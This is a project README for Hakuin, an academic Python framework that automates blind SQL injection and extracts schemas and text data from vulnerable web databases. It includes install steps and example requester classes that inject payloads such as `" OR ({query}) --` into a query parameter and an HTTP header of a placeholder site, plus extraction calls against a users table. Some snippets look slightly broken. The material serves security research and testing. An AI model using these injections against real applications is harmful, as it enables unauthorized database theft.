Hakuin is a Blind SQL Injection (BSQLI) inference optimization and automation framework written in Python 3. It abstract away the inference logic and allows users to easily and efficiently extract textual data in databases (DB) from vulnerable web applications. To speed up the process, Hakuin uses pre-trained language models for DB schemas and adaptive language models in combination with opportunistic string guessing for DB content.
Hakuin been presented at academic and industrial conferences:
Also, make sure to read our paper or see the slides.
To install Hakuin, simply run:
pip3 install hakuin
Developers should install the package locally and set the -e flag for editable mode:
git clone git@github.com:pruzko/hakuin.git
cd hakuin
pip3 install -e .
Once you identify a BSQLI vulnerability, you need to tell Hakuin how to inject its queries. To do this, derive a class from the Requester and override the request method. Also, the method must determine whether the query resolved to True or False.
import requests
from hakuin import Requester
class StatusRequester(Requester):
def request(self, ctx, query):
r = requests.get(f'http://vuln.com/?n=XXX" OR ({query}) --')
return r.status_code == 200class ContentRequester(Requester):
def request(self, ctx, query):
headers = {'vulnerable-header': f'xxx" OR ({query}) --'}
r = requests.get(f'http://vuln.com/', headers=headers)
return 'found' in r.content.decode()To start infering data, use the Extractor class. It requires a DBMS object to contruct queries and a Requester object to inject them. Currently, Hakuin supports SQLite and MySQL DBMSs, but will soon include more options. If you wish to support another DBMS, implement the DBMS interface defined in hakuin/dbms/DBMS.py.
from hakuin.dbms import SQLite
from hakuin import Extractor, Requester
class StatusRequester(Requester):
...
exf = Extractor(requester=StatusRequester(), dbms=SQLite())from hakuin.dbms import MySQL
...
exf = Extractor(requester=StatusRequester(), dbms=MySQL())Now that eveything is set, you can start inferring DB schemas.
# strategy:
# 'binary': Use binary search
# 'model': Use pre-trained models
schema = exf.extract_schema(strategy='model')# metadata:
# True: Detect column settings (data type, nullable, primary key)
# False: Pass
schema = exf.extract_schema(strategy='model', metadata=True)tables = exf.extract_table_names(strategy='model')
columns = exf.extract_column_names(table='users', strategy='model')Once you know the schema, you can extract the actual content.
# strategy:
# 'binary': Use binary search
# 'fivegram': Use five-gram model
# 'unigram': Use unigram model
# 'dynamic': Dynamically identify the best strategy. This setting
# also enables opportunistic guessing.
res = exfiltrate_text_data(table='users', column='address', strategy='dynamic'):More examples can be found in the tests directory.
This repository is maintained to fit the needs of security practitioners. Researchers looking to reproduce the experiments described in our paper should install the frozen version as it contains the original code, experiment scripts, and an instruction manual for reproducing the results.
@inproceedings{hakuin_bsqli,
title={Hakuin: Optimizing Blind SQL Injection with Probabilistic Language Models},
author={Pru{\v{z}}inec, Jakub and Nguyen, Quynh Anh},
booktitle={2023 IEEE Security and Privacy Workshops (SPW)},
pages={384--393},
year={2023},
organization={IEEE}
}